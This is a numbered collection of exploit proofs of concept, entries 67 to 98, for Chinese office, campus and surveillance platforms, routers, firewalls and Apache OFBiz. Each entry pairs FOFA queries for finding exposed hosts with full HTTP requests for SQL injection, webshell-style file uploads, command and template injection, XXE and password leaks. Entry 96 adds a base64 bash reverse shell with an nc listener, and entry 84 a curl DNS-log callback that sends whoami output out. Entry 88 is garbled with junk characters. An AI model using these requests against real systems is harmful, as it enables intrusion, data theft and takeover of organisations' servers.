GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 that the injected HashBytes call makes the database compute) when the injection works.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
newdocId and the multipart filename give the name of the file written, dir gives the directory it is written to (../ escapes the intended one), and fileType gives the extension. Keep the uploaded content to a harmless marker such as the out.print below; the JSP ends up inside the web root.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is then served from /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
Time-based (WAITFOR DELAY '0:0:5' adds about 5 seconds). The ;.js suffix is the usual servlet path-parameter trick: an authentication filter that whitelists static extensions sees a .js request while the container still dispatches to wf_printnum.jsp.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
Time-based, same ;.js filter bypass as entry 68; the injection point is gd_startUserCode.
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
The command travels base64-encoded in the SID header: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The __VIEWSTATE value is the payload that triggers execution and is replaced by PAYLOAD here.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 167025

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
Time-based: the accId parameter is injected with WAITFOR DELAY '0:0:5'; a vulnerable host answers about 5 seconds later than with a benign accId.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

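Checking the two kinds of SQL injection response used in entries 57 to 71 above, as an added example that is not part of the original list: the marker probes (entries 58 and 66) make the database compute the MD5 of a seed string through HashBytes, so the expected digest can be computed locally and searched for in the response; the WAITFOR DELAY probes (entries 64, 68, 69 and 71) only mean something against a baseline of benign round-trip times, because one slow answer from a loaded host proves nothing. The function names and the sample MSSQL error text are constructed for this example.

```python
import hashlib
import re
from typing import Sequence

# Constructed sample of the MSSQL conversion error that an error-based marker
# injection (entries 58 and 66) surfaces; not a real server response.
SAMPLE_MSSQL_ERROR = (
    "System.Data.SqlClient.SqlException: Conversion failed when converting the "
    "varchar value '0xe10adc3949ba59abbe56e057f20f883e' to data type int."
)


def mssql_md5_marker(seed: str) -> str:
    """Hex digest that the injected HashBytes('MD5', seed) makes the server compute."""
    return hashlib.md5(seed.encode("utf-8")).hexdigest()


def response_has_marker(body: str, seed: str) -> bool:
    """True if the response leaks the marker.

    fn_varbintohexstr / fn_sqlvarbasetostr render the hash as 0x followed by
    32 hex digits; letter case varies, so match case-insensitively on the
    digits only and never on the 0x prefix.
    """
    return re.search(mssql_md5_marker(seed), body, re.IGNORECASE) is not None


def time_based_confirmed(baseline: Sequence[float], delayed: Sequence[float],
                         delay_s: float = 5.0, tolerance_s: float = 1.0) -> bool:
    """Decide a WAITFOR DELAY probe (entries 64, 68, 69, 71) from timing samples.

    baseline: round-trip seconds for the same request with a benign value.
    delayed:  round-trip seconds with the WAITFOR DELAY '0:0:5' payload.
    Every delayed sample must exceed the *slowest* baseline sample by roughly
    delay_s, so a single slow response on a busy host is not taken as evidence.
    """
    if not baseline or not delayed:
        raise ValueError("need at least one sample in each group")
    slowest_benign = max(baseline)
    return all(t - slowest_benign >= delay_s - tolerance_s for t in delayed)


if __name__ == "__main__":
    print(mssql_md5_marker("123456"))                              # e10adc3949ba59abbe56e057f20f883e
    print(response_has_marker(SAMPLE_MSSQL_ERROR, "123456"))        # True
    print(time_based_confirmed([0.21, 0.19, 0.25], [5.3, 5.2, 5.4]))  # True
```

Feed time_based_confirmed with several samples of each kind taken back to back; if the baseline itself spreads over seconds, the host is too noisy for a timing verdict and a marker-style probe is the better check.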
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
xmlValue is URL-encoded XML whose DOCTYPE declares the external entity xxe as file:///c:/windows/win.ini and references it in the VALUE field; the file content is reflected in the response. Keep Content-Length equal to the body you actually send.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
The XML request body is replaced by PAYLOAD.
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
The time parameter of setSyncTimeHost is substituted into a shell command, so the backticked ifconfig runs and its output is written to test28256.txt under /cgi-bin/.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the output file:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
FreeMarker template injection: UnitCode is rendered as a template, and freemarker.template.utility.Execute?new() runs the given command, which here writes a marker file under the ROOT webapp.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the marker file:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
The multipart upload accepts an .aspx filename; the folder field selects the target directory.
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
The target field chooses the directory the file is saved in; the declared Content-Type (image/png) is not checked against the content.
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
The path parameter is passed to a shell; |id runs id and its output is returned in the response.
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
The report parameter is used as a file path without normalisation, so ../xykqmfxpoas.jsp writes the request body as a JSP one directory up, inside the web root.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written JSP; a vulnerable host returns oessqeonylzaf:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
Command 255 with an empty user name and login handle -1 returns account data, including passwords, without authentication.
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
The z2 parameter is concatenated into a shell command; "|id;" breaks out of the quoted argument and runs id.
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
The command to run travels in the Cmd header; the JSON body (a data-source definition) is replaced by PAYLOAD.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
FreeMarker template injection in the sql field, same primitive as entry 76. The payload below confirms execution out of band: replace ip.port.kr9dqoau.dnslog.pw with your own DNS-log domain and watch for the lookup.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is below; the accountId traversal makes the upload land in tomcat/webapps, and the body (replaced by PAYLOAD) plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
The host parameter of the ping test is passed to a shell; the %0a line breaks inject cat /etc/passwd (with ${IFS} standing in for the space) around the ping command.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
The suffix parameter is appended to the stored file name unchecked, so /../../../jfhatuwe.php moves the upload into the web root as a PHP file.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The uploaded file is then reachable at /jfhatuwe.php and returns 2ZqGNnsjzzU2GBBPyd8AIA7QlDq.

$ {" z3 d8 c" r! Y5 t88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
& [1 U$ A- K* F$ MFOFA:title="明御安全网关"
' E& N* v8 ^$ Z/ u+ u, x8 C# bGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.11 J7 O4 A$ x/ Z0 `4 d, | d! b
Host: x.x.x.xx.x.x.x2 z0 D% T6 ~# x: }0 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ N* X, C/ f% a V: {8 J2 z/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 g: a, T' F' |0 ]Accept-Encoding: gzip, deflate2 I/ Q% m7 ^* w3 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. J5 w( {" w+ A% wConnection: close6 y; \6 a" S1 H* @
9 E8 ?: a) P2 i0 \
0 ~8 s0 N P- ~* s0 O* U& b) U/astdfkhl.php1 U- `4 N+ Y8 D* g/ Q8 H6 k* \
$ K. z0 l' m: g/ @/ z2 m
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
%70 is the letter p, so editflow_manager.js%70 reaches editflow_manager.jsp while looking like a .js request to a filter that matches on the raw path. The injected union select 111*222 makes a vulnerable host return 24642 in the response.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
jsondata[ip] is passed to the ping utility unescaped; the ipconfig below replaces the host argument and its output comes back in the response.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
The ..;/ segment bypasses the path-based access check in front of /center/api/, and fileName is then used without normalisation, so the traversal returns /etc/passwd.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization; the Testcmd header holds the command the payload executes (echo test here). The JSON body is replaced by PAYLOAD.
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin (奇安信) NetGod (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
The import handler saves upfile under /attachements/ with its original name and no authentication.
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file; a vulnerable host returns wagletqrkwrddkthtulxsqrphulnknxa:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin (奇安信) NetGod (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
Same handler pattern as entry 93 on a second import endpoint; the file is again saved under /attachements/ with its original name.
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the file uploaded above (cciytdzu.txt, not the name from entry 93); a vulnerable host returns pxplitttsrjnyoafavcajwkvhxindhmu:

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload for the placeholder in the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
